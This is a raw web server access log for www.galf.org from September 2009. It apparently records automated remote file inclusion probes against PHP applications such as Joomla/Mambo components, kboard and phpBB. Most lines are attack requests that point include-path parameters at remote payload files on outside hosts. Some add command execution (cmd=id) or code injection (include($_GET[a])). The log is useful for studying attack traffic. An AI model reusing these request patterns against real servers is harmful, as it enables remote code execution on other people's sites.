210.205.6.233 - - [20/Sep/2009:22:50:30 -0700] "GET /logs/access_090309.log%20%20///include/footer.php?_path[counter]=http://www.4pppp.com//icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [20/Sep/2009:22:50:48 -0700] "GET /logs///include/footer.php?_path[counter]=http://www.4pppp.com/icon1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [20/Sep/2009:22:50:48 -0700] "GET /logs/access_090309.log%20%20///include/footer.php?_path[counter]=http://www.4pppp.com/icon1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [20/Sep/2009:22:50:48 -0700] "GET //include/footer.php?_path[counter]=http://www.4pppp.com/icon1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [20/Sep/2009:22:51:03 -0700] "GET /logs/access_090309.log///include/footer.php?_path[counter]=http://www.4pppp.com//icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [20/Sep/2009:22:51:15 -0700] "GET /logs/access_090309.log///include/footer.php?_path[counter]=http://www.4pppp.com/icon1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Sep/2009:22:52:32 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Sep/2009:22:52:32 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Sep/2009:22:52:32 -0700] "GET /logs/access_090316.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Sep/2009:22:52:33 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Sep/2009:22:52:33 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Sep/2009:22:52:38 -0700] "GET /logs/access_090316.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Sep/2009:22:52:43 -0700] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Sep/2009:22:52:44 -0700] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [20/Sep/2009:22:57:37 -0700] "GET /logs/access_090608.log//index.php?pagina=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
114.4.8.14 - - [20/Sep/2009:22:57:38 -0700] "GET /index.php?pagina=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
114.4.8.14 - - [20/Sep/2009:22:57:38 -0700] "GET /logs//index.php?pagina=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
114.4.8.14 - - [20/Sep/2009:23:00:50 -0700] "GET /logs/access_090511.log//index.php?pagina=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
78.172.38.225 - - [20/Sep/2009:23:00:55 -0700] "GET /modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://saddogshirts.com/t.dat?&list=1&cmd=id HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.galf.org"
86.109.103.36 - - [20/Sep/2009:23:04:16 -0700] "GET /logs/access.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.anyche.com/goods_img1/satu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
86.109.103.36 - - [20/Sep/2009:23:04:16 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.anyche.com/goods_img1/satu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
86.109.103.36 - - [20/Sep/2009:23:04:16 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.anyche.com/goods_img1/satu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.240.126.32 - - [20/Sep/2009:23:04:29 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://happy-winners.de//contenido/includes/heva/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.240.126.32 - - [20/Sep/2009:23:04:29 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://happy-winners.de//contenido/includes/heva/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.240.126.32 - - [20/Sep/2009:23:04:29 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://happy-winners.de//contenido/includes/heva/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.240.126.32 - - [20/Sep/2009:23:04:30 -0700] "GET /logs/access_090420.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://happy-winners.de//contenido/includes/heva/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
86.109.103.36 - - [20/Sep/2009:23:05:15 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.anyche.com/goods_img1/satu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.75.220.40 - - [20/Sep/2009:23:06:40 -0700] "GET / HTTP/1.1" 200 1048 "http://www.google.com/search?client=firefox-a&rls=org.mozilla%3Asv-SE%3Aofficial&channel=s&hl=sv&source=hp&q=index+of%2Flesbianas&lr=&btnG=Google-s%C3%B6kning" "Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "www.galf.org"
94.75.220.40 - - [20/Sep/2009:23:06:40 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "www.galf.org"
65.55.209.190 - - [20/Sep/2009:23:08:50 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.209.190 - - [20/Sep/2009:23:08:54 -0700] "GET /labia/?D=A HTTP/1.1" 200 524 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
206.225.23.4 - - [20/Sep/2009:23:19:03 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [20/Sep/2009:23:19:03 -0700] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [20/Sep/2009:23:19:03 -0700] "GET /logs/access.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [20/Sep/2009:23:19:06 -0700] "GET /logs/access.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [20/Sep/2009:23:19:06 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [20/Sep/2009:23:19:06 -0700] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.30.142.245 - - [20/Sep/2009:23:20:53 -0700] "GET /logs/ HTTP/1.0" 200 4783 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
205.134.252.26 - - [20/Sep/2009:23:32:08 -0700] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
205.134.252.26 - - [20/Sep/2009:23:32:08 -0700] "GET /logs/access_090817.log%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
205.134.252.26 - - [20/Sep/2009:23:32:08 -0700] "GET //skin/ggambo7002_board/comment_modify.php?dir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [20/Sep/2009:23:33:59 -0700] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
58.184.252.3 - - [20/Sep/2009:23:34:00 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
58.184.252.3 - - [20/Sep/2009:23:34:01 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
58.184.252.3 - - [20/Sep/2009:23:34:30 -0700] "GET /logs/access_090608.log//index.php?pagina=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.184.252.3 - - [20/Sep/2009:23:34:31 -0700] "GET /index.php?pagina=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.184.252.3 - - [20/Sep/2009:23:34:32 -0700] "GET /logs//index.php?pagina=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.97.212.185 - - [20/Sep/2009:23:34:51 -0700] "GET /include/footer.php?_path[counter]=http://montaguekorea.com/upload/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [20/Sep/2009:23:34:51 -0700] "GET /logs//include/footer.php?_path[counter]=http://montaguekorea.com/upload/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [20/Sep/2009:23:34:51 -0700] "GET /logs/access_090309.log%20%20//include/footer.php?_path[counter]=http://montaguekorea.com/upload/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [20/Sep/2009:23:34:56 -0700] "GET /logs//include/footer.php?_path[counter]=http://montaguekorea.com/upload/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [20/Sep/2009:23:34:56 -0700] "GET /include/footer.php?_path[counter]=http://montaguekorea.com/upload/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [20/Sep/2009:23:34:56 -0700] "GET /logs/access_090309.log%20%20//include/footer.php?_path[counter]=http://montaguekorea.com/upload/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
205.134.252.26 - - [20/Sep/2009:23:35:07 -0700] "GET /logs/access_090817.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
205.134.252.26 - - [20/Sep/2009:23:35:07 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
205.134.252.26 - - [20/Sep/2009:23:35:07 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [20/Sep/2009:23:36:34 -0700] "GET /logs/access_090309.log//include/footer.php?_path[counter]=http://montaguekorea.com/upload/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [20/Sep/2009:23:36:35 -0700] "GET /logs/access_090309.log//include/footer.php?_path[counter]=http://montaguekorea.com/upload/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [20/Sep/2009:23:38:57 -0700] "GET /logs/access_090511.log//index.php?pagina=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
205.134.252.26 - - [20/Sep/2009:23:39:08 -0700] "GET /logs/access_090824.log%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [20/Sep/2009:23:43:16 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://china-top.ru//assets/snippets/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [20/Sep/2009:23:43:16 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://china-top.ru//assets/snippets/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [20/Sep/2009:23:43:21 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://china-top.ru//assets/snippets/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [20/Sep/2009:23:44:08 -0700] "GET /logs/access_090420.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://china-top.ru//assets/snippets/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.220.59 - - [20/Sep/2009:23:50:18 -0700] "GET /logs/access_090420.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.220.59 - - [20/Sep/2009:23:50:18 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 200 4807 "-" "Mozilla/5.0" "www.galf.org"
67.228.220.59 - - [20/Sep/2009:23:50:18 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
78.172.38.225 - - [20/Sep/2009:23:53:49 -0700] "GET /modules/MambWeather/Savant2/main.php?mosConfig_absolute_path=http://saddogshirts.com/t.dat?&list=1&cmd=id HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:23:55:16 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:23:55:16 -0700] "GET /logs/access_090601.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:23:55:19 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:23:55:27 -0700] "GET /logs/access_090511.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.220.59 - - [20/Sep/2009:23:56:23 -0700] "GET /logs/access_090420.log/////?_SERVER[DOCUMENT_ROOT]=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.220.59 - - [20/Sep/2009:23:57:38 -0700] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [21/Sep/2009:00:00:55 -0700] "GET /logs/access_090601.log%20%20/////index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [21/Sep/2009:00:00:55 -0700] "GET /logs/////index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.15.230.189 - - [21/Sep/2009:00:14:53 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.autowall.ru///id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.15.230.189 - - [21/Sep/2009:00:14:53 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.autowall.ru///id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.15.230.189 - - [21/Sep/2009:00:14:53 -0700] "GET /logs/access.log%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.autowall.ru///id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.15.230.189 - - [21/Sep/2009:00:14:55 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.autowall.ru///id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.15.230.189 - - [21/Sep/2009:00:14:55 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.autowall.ru///id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.15.230.189 - - [21/Sep/2009:00:14:55 -0700] "GET /logs/access.log%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.autowall.ru///id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
83.170.122.30 - - [21/Sep/2009:00:17:40 -0700] "GET /index.php?p=http://ski.spb.ru/sklons/KURORTI-AVSTRII/mairhofen/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.galf.org"
83.170.122.30 - - [21/Sep/2009:00:17:40 -0700] "GET /logs/index.php?p=http://ski.spb.ru/sklons/KURORTI-AVSTRII/mairhofen/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.galf.org"
189.55.128.16 - - [21/Sep/2009:00:41:20 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
189.55.128.16 - - [21/Sep/2009:00:41:20 -0700] "GET /logs/access.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
189.55.128.16 - - [21/Sep/2009:00:41:20 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.78.116.209 - - [21/Sep/2009:00:55:44 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.78.116.209 - - [21/Sep/2009:00:55:49 -0700] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.78.116.209 - - [21/Sep/2009:00:55:49 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.78.116.209 - - [21/Sep/2009:00:55:51 -0700] "GET /logs/access_090316.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.209 - - [21/Sep/2009:00:55:52 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.209 - - [21/Sep/2009:00:55:52 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.209 - - [21/Sep/2009:00:56:05 -0700] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [21/Sep/2009:00:59:51 -0700] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [21/Sep/2009:00:59:51 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [21/Sep/2009:00:59:51 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.209 - - [21/Sep/2009:01:04:51 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.78.116.209 - - [21/Sep/2009:01:04:51 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.78.116.209 - - [21/Sep/2009:01:04:51 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.47.71.89 - - [21/Sep/2009:01:05:22 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [21/Sep/2009:01:05:22 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [21/Sep/2009:01:05:22 -0700] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [21/Sep/2009:01:05:58 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [21/Sep/2009:01:05:59 -0700] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [21/Sep/2009:01:05:59 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [21/Sep/2009:01:06:02 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [21/Sep/2009:01:06:02 -0700] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [21/Sep/2009:01:06:02 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.209 - - [21/Sep/2009:01:06:12 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.47.71.89 - - [21/Sep/2009:01:06:15 -0700] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [21/Sep/2009:01:06:15 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [21/Sep/2009:01:06:15 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.209 - - [21/Sep/2009:01:06:36 -0700] "GET /logs/access_090420.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
